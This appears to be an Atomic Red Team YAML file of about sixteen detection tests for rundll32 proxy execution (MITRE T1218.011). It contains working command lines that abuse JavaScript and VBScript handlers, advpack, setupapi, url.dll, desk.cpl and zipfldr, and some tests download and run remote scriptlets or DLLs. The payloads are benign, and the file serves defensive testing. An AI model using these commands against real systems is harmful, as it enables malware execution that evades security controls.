attack_technique: T1218.011 display_name: 'Signed Binary Proxy Execution: Rundll32' atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/) Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. supported_platforms: - windows input_arguments: file_url: description: location of the payload type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: command: | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close(); cleanup_command: | taskkill /IM notepad.exe /f name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb description: | Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched supported_platforms: - windows input_arguments: command_to_execute: description: Command for rundll32.exe to execute type: string default: calc.exe executor: command: | rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) name: command_prompt - name: Rundll32 execute VBscript command using Ordinal number auto_generated_guid: 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 description: | Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched supported_platforms: - windows input_arguments: command_to_execute: description: Command for rundll32.exe to execute type: string default: calc.exe executor: command: | rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 description: | Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched supported_platforms: - windows input_arguments: inf_to_execute: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: - description: | Inf file must exist on disk at specified location ("#{inf_to_execute}") prereq_command: | if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: | rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1, name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 description: | Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml supported_platforms: - windows input_arguments: inf_to_execute: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf dependency_executor_name: powershell dependencies: - description: | Inf file must exist on disk at specified location ("#{inf_to_execute}") prereq_command: | if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: | rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1, name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 description: | Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml supported_platforms: - windows input_arguments: inf_to_execute: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: - description: | Inf file must exist on disk at specified location ("#{inf_to_execute}") prereq_command: | if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: command: | rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}" name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 description: | Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml supported_platforms: - windows input_arguments: inf_to_execute: description: Local location of inf file type: string default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf dependency_executor_name: powershell dependencies: - description: | Inf file must exist on disk at specified location ("#{inf_to_execute}") prereq_command: | if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" executor: command: | rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}" name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 description: | IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" supported_platforms: - windows executor: command: | rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta" rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs" name: command_prompt - name: Launches an executable using Rundll32 and pcwutl.dll auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 description: | Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. supported_platforms: - windows input_arguments: exe_to_launch: description: Path of the executable to launch type: path default: '%windir%\System32\notepad.exe' executor: command: | rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} name: command_prompt - name: Execution of non-dll using rundll32.exe auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac description: | Rundll32.exe running non-dll supported_platforms: - windows input_arguments: input_url: description: Url to download the DLL type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll input_file: description: Non-dll file type: string default: C:\Users\$env:username\Downloads\calc.png dependency_executor_name: powershell dependencies: - description: | Non-dll file must exist on disk at specified location prereq_command: | if (Test-Path #{input_file}) {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: powershell command: | rundll32.exe #{input_file}, StartW - name: Rundll32 with Ordinal Value auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 description: | Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. Upon successful execution, Calc.exe will spawn. supported_platforms: - windows input_arguments: input_url: description: Url to download the DLL type: url default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll input_file: description: DLL File type: string default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll dependency_executor_name: powershell dependencies: - description: | DLL file must exist on disk at specified location prereq_command: | if (Test-Path "#{input_file}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt command: | rundll32.exe "#{input_file}",#2 - name: Rundll32 with Control_RunDLL auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e description: | Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. supported_platforms: - windows input_arguments: input_url: description: Url to download the DLL type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll input_file: description: DLL File type: string default: PathToAtomicsFolder\T1047\bin\calc.dll dependency_executor_name: powershell dependencies: - description: | DLL file must exist on disk at specified location prereq_command: | if (Test-Path "#{input_file}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}" executor: name: command_prompt command: | rundll32.exe shell32.dll,Control_RunDLL "#{input_file}" - name: Rundll32 with desk.cpl auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917 description: | Rundll32.exe loading an executable renamed as .scr using desk.cpl Reference: - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/) SIGMA rules: - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml) - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml) supported_platforms: - windows input_arguments: exe_to_launch: description: Path of the executable to launch type: path default: '%windir%\System32\calc.exe' executor: name: command_prompt command: | copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr - name: Running DLL with .init extension and function auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 description: | This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script. supported_platforms: - windows input_arguments: dll_file: description: The DLL file to be called type: string default: PathToAtomicsFolder\T1218.011\bin\_WT.init dll_url: description: The URL to the DLL file that must be downloaded type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init dependency_executor_name: powershell dependencies: - description: The DLL file to be called must exist at the specified location (#{dll_file}) prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" executor: command: | rundll32.exe #{dll_file},krnl name: command_prompt - name: Rundll32 execute command via FileProtocolHandler auto_generated_guid: f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8 description: | Test execution of a command using rundll32.exe and the FileProtocolHandler technique. Upon execution, calc.exe will be launched. This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7 supported_platforms: - windows input_arguments: command_to_execute: description: Command for rundll32.exe to execute type: string default: calc.exe executor: command: | rundll32.exe url.dll,FileProtocolHandler #{command_to_execute} name: command_prompt - name: Rundll32 execute payload by calling RouteTheCall auto_generated_guid: 8a7f56ee-10e7-444c-a139-0109438288eb description: | Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml supported_platforms: - windows input_arguments: exe_to_launch: description: Path of the executable to launch type: path default: "'%windir%\\System32\\calc.exe'" executor: command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}" cleanup_command: name: powershell elevation_required: false